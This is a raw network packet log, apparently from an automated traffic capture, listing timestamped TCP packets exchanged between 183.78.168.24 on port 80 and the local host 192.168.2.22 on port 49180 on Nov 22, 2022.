                                                                                Nov 22, 2022 05:10:31.043288946 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.043370962 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.043507099 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.043524981 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.043602943 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.043628931 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.043646097 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.043831110 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.043848991 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.043989897 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.044007063 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.044023037 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.044040918 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.044079065 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.044287920 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.044305086 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.044346094 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.044383049 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.044486046 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.044514894 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.044553041 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.044761896 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.044780970 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.044820070 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.044876099 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.044893026 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.044935942 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.044971943 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.045113087 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.045186996 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.045241117 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.045262098 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.045336962 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.045523882 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.045541048 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.045567989 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.045603991 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.045766115 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.045782089 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.045806885 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.045944929 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.045960903 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.046000957 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.046096087 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.046197891 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.046215057 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.046262980 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.046441078 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.046459913 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.046694994 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.048418999 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.048504114 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.048528910 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.048554897 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.048712969 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.048731089 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.048770905 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.048808098 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.048885107 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.048963070 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.049001932 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.049181938 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.049199104 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.049429893 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.049449921 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.049474001 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.049609900 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.049896955 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.049915075 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.049942017 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.049981117 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.050123930 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.050165892 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.050203085 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.050282001 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.050326109 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.050509930 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.197002888 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.197029114 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.197079897 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.197159052 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.197175980 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.197216988 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.197252035 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.197443962 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.197462082 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.197498083 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.197757006 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.197773933 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.197799921 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.197814941 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.197827101 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.197874069 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.197954893 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.197971106 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.198016882 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.198157072 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.198174000 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.198219061 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.198312044 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.198328018 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.198473930 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.198492050 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.198519945 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.198678970 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.198695898 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.198740005 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.198834896 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.198851109 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.198909998 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.198930025 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.199120045 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.199136972 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.199182987 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.199276924 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.199292898 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.199390888 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.199402094 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.199599028 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.199637890 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.199666977 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.199754953 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.199852943 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.199871063 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.199898958 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.200014114 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.200031042 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.200076103 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.200170994 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.200189114 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.200233936 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.200375080 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.200395107 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.200537920 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.200556040 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.200586081 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.202510118 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.202532053 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.202591896 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.202639103 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.202655077 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.202688932 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.202723980 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.202935934 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.202951908 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.203011036 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.203031063 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.203210115 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.203226089 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.203279972 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.203893900 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.203915119 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.203970909 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.203996897 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.204054117 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.204133034 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.204180002 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.204359055 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.204379082 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.204416990 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.204467058 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.351305008 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.351335049 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.351351976 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.351368904 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.351394892 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.351414919 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.351475000 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.351564884 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.351582050 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.351610899 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.351824999 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.351841927 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.351876020 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.351938009 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.351955891 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.351994991 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.352101088 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.352118015 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.352158070 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.352266073 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.352353096 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.352458000 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.352473974 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.352540016 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.352540016 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.352663040 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.352685928 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.352725029 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.352818012 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.352835894 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.352875948 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.352976084 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.352993965 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.353039026 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.353178024 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.353194952 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.353230953 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.353266001 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.353352070 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.353398085 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.353542089 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.353559971 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.353606939 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.353704929 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.353722095 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.353907108 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.353924036 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.353950977 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.354101896 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.354118109 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.354140997 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.354211092 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.354228020 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.354268074 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.354422092 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.354440928 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.354578972 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.354595900 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.354698896 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.354959011 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.355006933 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.357379913 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.357501984 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.357521057 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.357564926 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.357660055 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.357676983 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.357866049 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.357882977 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.357903004 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.358061075 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.358078957 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.358114004 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.358225107 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.358241081 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.358419895 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.358438015 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.358455896 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.358581066 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.358597994 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.358632088 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.358782053 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.358798027 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.358947039 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.358963013 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.358985901 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.359061956 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.359179974 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.505477905 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.505505085 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.505518913 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.505563021 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.505629063 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.505743980 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.505781889 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.505800009 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.505839109 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.505913019 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.505975962 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.505996943 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.506066084 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.506149054 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.506198883 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.506221056 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.506349087 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.506426096 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.506474018 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.506548882 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.506583929 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.506705999 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.506752968 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.506788015 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.506865025 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.506947994 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.506994963 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.507030964 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.507145882 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.507225037 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.507272005 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.507307053 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.507384062 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.507468939 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.507515907 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.507570982 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.507667065 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.507785082 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.507829905 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.507865906 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.507957935 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.508105040 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.508151054 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.508188009 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.508266926 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.508311987 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.508385897 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.508426905 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.508466959 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.508513927 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.508595943 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.508704901 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.508745909 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.508795977 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.508867979 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.508946896 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.511459112 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.511476040 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.511492968 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.511672020 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.511718988 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.511739969 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.511805058 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.511950016 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.511986017 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.511996984 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.512090921 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.512202978 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.512249947 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.512350082 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.512384892 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.512447119 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.512495041 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.512562990 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.512628078 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.512747049 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.512792110 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.512828112 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.512906075 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.513030052 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.513063908 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.513077021 CET4918080192.168.2.22183.78.168.24
                                                                                Nov 22, 2022 05:10:31.513190985 CET8049180183.78.168.24192.168.2.22
                                                                                Nov 22, 2022 05:10:31.513237000 CET4918080192.168.2.22183.78.168.24
